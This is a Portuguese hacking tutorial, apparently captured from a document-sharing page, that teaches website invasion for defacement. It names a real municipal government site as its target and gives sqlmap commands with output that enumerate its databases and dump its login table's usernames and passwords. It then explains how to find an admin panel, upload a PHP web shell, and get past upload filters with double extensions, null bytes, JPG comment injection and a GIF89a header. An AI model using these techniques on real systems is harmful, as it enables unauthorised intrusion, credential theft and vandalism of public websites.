Sei sulla pagina 1di 5

Ol Galera,Sou o Otrasher , e trago a vocs que caminham no Mundo do Underground,uma simples Forma de invaso a sites vulnerveis SQL injection

n , Principais Ferramentas que irei usar o SQLMAP e ACUNETIX. Bom,Primeiro passo encontrar um Site Vulnervel. E pra isso Usaremos DORKS. DORKS,so endereos aos quais voc associa ao Google,Procurando sites Vulnerveis! Lista de 7,000 DORKS: http://http://pastebin.com/iAA7Ptnw Aps abrir um site,depois de Jogar algumas dessas DORKS no Google,Voc Vai ter que " Testar" Pra ver se o link vulnervel; Para isso voc vai por o sinal de aspas (') no final da URL.Se for Vulnervel voc vai se deparar com um erro, Parecido com esse ( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ) Exemplo: http://http://www.ubatuba.sp.gov.br/secret/secret.php?id=13' =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bom achamos um Site Vulnervel... Agora vamos para o SQLMAP 1 Baixe o SQLMAP Link: http://http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9. zip/download Extraia o arquivo, Para o C: (Para mim fica mais fcil). Aps baixar e Extrair,baixe o Python 2.7: (Necessrio para rodar o SqlMap) . Link: http://http://www.python.org/getit/releases/2.7/ Aps ter Instalado o python 2.7.vamos Usar o SQLMAP! Se voc extraiu o sqlmap para o C: ,usaremos os Seguintes Comandos com o Prompt De Comando. (Comandos Grifados) C:Documents and SettingsAdmin>cd C:>cd sqlmap C:sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --dbs (esse comando "--dbs" listar as DBS existentes) Aps isso vai aparecer, as DBS existentes. ---[*] information_schema [*] siteubt [*] test ---Ok,temos as DBS;eu costumo ir marcando tudo em um txt. Agora vamos Procurar a DB que o site est usando,usaremos o seguinte comando. C:sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --cur rent-db (esse comando "--current-db" vai listar a DB que o site esta usando.

--current database: 'siteubt' --Pronto sabemos que a DB que est sendo suada siteubt Agora vamos Listar as tabelas existentes nessa DB,ento usaremos o seguinte comand o. C:sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D si teubt --tables (esse comando "-D siteubt --tables","-D" especifica a DB e "--tab les" vai listar as tabelas. +-----------------+ | a3_questionario | | agenda | | agentes | | anexos | | brinq_cad | | brinq_freq | | cad_edital | | cad_edital2 | | ccz | | concurso | | concurso2 | | concurso_emdurb | | dias | | documento | | dperiodo | | esportes | | falacidadao | | foto | | foto_hab | | foto_pag | | foto_san | | fotos | | frotas | | galeriafotos | | guiasn | | infoccz | | issretencao | | itbi | | licit | | log_setor | | login | | login2 | | logs | | luos | | menu | | noticias | | notluos | | obras | | pagina | | pbairros | | pcidade | | pescola | | pfamilias | | pidoso | | pidososinfo | | pmedicamento | | pmedutil |

| pmhis | | pmsb | | pservsaude | | pssaudeutil | | rh1 | | rh2 | | secretarias | | servicosocial | | tipo | | tipo2 | | tipo_hab | | viaiptu | +-----------------+ Pronto,ai temos as tabelas, Agora partir dai procuraremos uma tabela que seja de nosso interesse,como exemplo, uma que podemos usar para Logar no site,digamos,c oisas preciosas... No caso vemos ali 3 tabelas que podem sem do nosso interesse. --log_setor login login2 --Bom agora vamos listar as tabelas,e vamos ver as colunas que tem nelas,Usaremos o seguinte comando. C:sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D si teubt -T login --columns (esse comando ir listar as colunas dentro da tabela "log in") Nos deparamos Com as seguintes colunas. +----------+-------------------------------+ | Column | Type | +----------+-------------------------------+ | codlogin | mediumint( unsigned | | login | varchar(100) | | senha | varchar(120) | +----------+-------------------------------+ login e senha...iremos dar um DUMP neles....Ento usaremos o seguinte comando.(Lem brando que eu vou anotando todos os resultados que consigo em todo esse procedim ento) C:sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D si teubt -T login -C login,senha --dump (esse comando "--dump" mostrara os resultad os que tanto queremos '-' ) Se voc quer explorar muito o site,dump em todas as tabelas de todas as DBs =D Bom nesse procedimento usamos os Seguintes comandos... ***COMANDOS*** sqlmap.py --url sqlmap.py --url sqlmap.py --url sqlmap.py --url sqlmap.py --url sdosite' --dump *************** *************** *************** *************** *************** --dbs --current-db -D 'databasedosite' --tables -D 'databasedosite' -T 'tabeladosite' --columns -D 'databasedosite' -T 'tabeladosite" -C 'coluna

************ o site que voc vai invadir Nas colunas no se esquea de separar por , [virgula] ex. usuario,senha --dump =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Ok,por exemplo,se conseguirmos Logins e senhas de administradores do site,vamos precisar,Procurar uma area de LOGIN para efetuar o deface. Eu uso o ACUNETIX poi s ele lista as pastas que esto no site. LINK: http://http://www.acunetix.com/vulnerability-scanner/download.htm OBS: Acunetix bom que ele uma ferramenta que procura falhas no site,com sorte,v oc pode encontrar diversas falhas escaneando um site com o acunetix. Ok,aps logarmos no site,o que temos a fazer,e encontrar uma rea de Upload,e fazer upload de nossa shell...Com a shell podemos alterar o site. Certos sites,recusam fazer upload de arquivos .php , Como a shell .php , temos q ue burlar o upload, faremos da shell, JPG, como se fosse imagem,o que tem que fa zer mudar de .php para .php.jpg , assim taremos upando a shell como imagem. Existem vrias formas de se burlar sistemas de upload de imagens em sites. Nesse tutorial vou explicar os mais conhecidos mtodos e claro, os melhores mtodos. O porque de ns querermos burlar o sistema, facil, ns queremos burlar ou para coloc ar um outro tipo de extenso ou ter algum privilgio no site ou no servidor onde ele est hospedado. Para termos algum tipo de privilgio, ns teremos que upar uma shell, no caso em PHP ou em C, que ser demonstrado nesse tutorial. Quando voc vai upar uma shell em PHP em um sistema de upload de imagens .jpg, ele atravs do filtro de extenses, ele vai te dar um aviso de que no possvel fazer uploa d desse arquivo. O que temos que fazer descobrir porque ele no nos d essa permisso. A primeira coisa que temos que verificar se ele pega apenas a primeira extenso de pois do primeiro ponto (.), por isso iremos tentar upar nossa shell da seguinte forma renomeando o arquivo: Exemplo: minhashell.jpg.php Assim ele seria reconhecido como um arquivo PHP, pois a real extenso .php. Na maioria das vezes essa tcnica funciona, mas claro que tem sites que no iro aceit ar isso, por isso iremos tentar de outra forma. Alguns sites pegam apenas a ltima extenso do arquivo, mas apenas reconhecem a prim eira extenso depois do ponto, assim ns podemos upar a shell da seguinte forma: Exemplo: minhashell.php.jpg OU minhashell.jpg%00.php Assim ele seria reconhecido como um arquivo PHP, pois a extenso real jpg, mas com o eliminada a segunda extenso, ento ele seria renomeado pelo filtro para um arquiv o .php. Um outro tipo de filtro vulnervel o filtro em que se pode anular a ltima extenso at ravs de um comando null antes da ltima extenso. O arquivo renomeado ficaria assim: Exemplo: minhashell.php%00.jpg OU minhashell.jpg%00. php O filtro iria aceitar o arquivo por ele ser uma extenso .jpg, porm como um comando anulando a ltima extenso, ento ele reconheceria o arquivo como .php apenas. A maioria dos sistemas de upload reconhece apenas a extenso do arquivo, mas no o t ipo de arquivo, isso muito perigoso para o servidor, pois um arquivo pode ter um a extenso .jpg mas ser um arquivo do tipo PHP.

Com isso o arquivo ter uma extenso .jpg e ser hospedado no servidor, mas atravs de u m exploit, ele pode ser renomeado ou voc pode modificar um arquivo JPG com linhas em PHP com um editor hexadecimal, mas na maioria das vezes o arquivo corrompe, ficando assim impossibilitado de seguir qualquer comando estabelecido por voc. Outro caso que o servidor apenas reconhece o tipo de arquivo, mas no a extenso. Um modo de mudar essa situao usando o edjpgcom, um software prprio para fazer esse tipo de modificao em arquivo JPG. A primeira coisa que voc vai fazer criar um pasta chamada jpg no seu C: e extrair esse arquivo nessa pasta. Agora abra o CMD (prompt de comando). Agora d um Exemplo: cd c:jpg D o seguinte comando agora: Exemplo: edjpgcom.exe suaimagem.jpg Ir aparecer uma janela e no campo de texto ter um texto, remova esse texto e ponha sua linha de comando em PHP, que ser sua shell/exploit e salve. No coloque comandos muito grandes, pois ir corromper o arquivo, ponha apenas algum as linhas (a shell c99 no funciona nesse caso pois ela grande). Agora renomeie o arquivo para .php e faa upload pelo sistema de upload do site e pronto, no ir mais aparecer aquele erro de "Invalid file Dimensions".

Ou podem fazer do seguinte modo ; Exemplo: GIF89a; <?php /* r57 shell here */ ?> Bom isso.

Potrebbero piacerti anche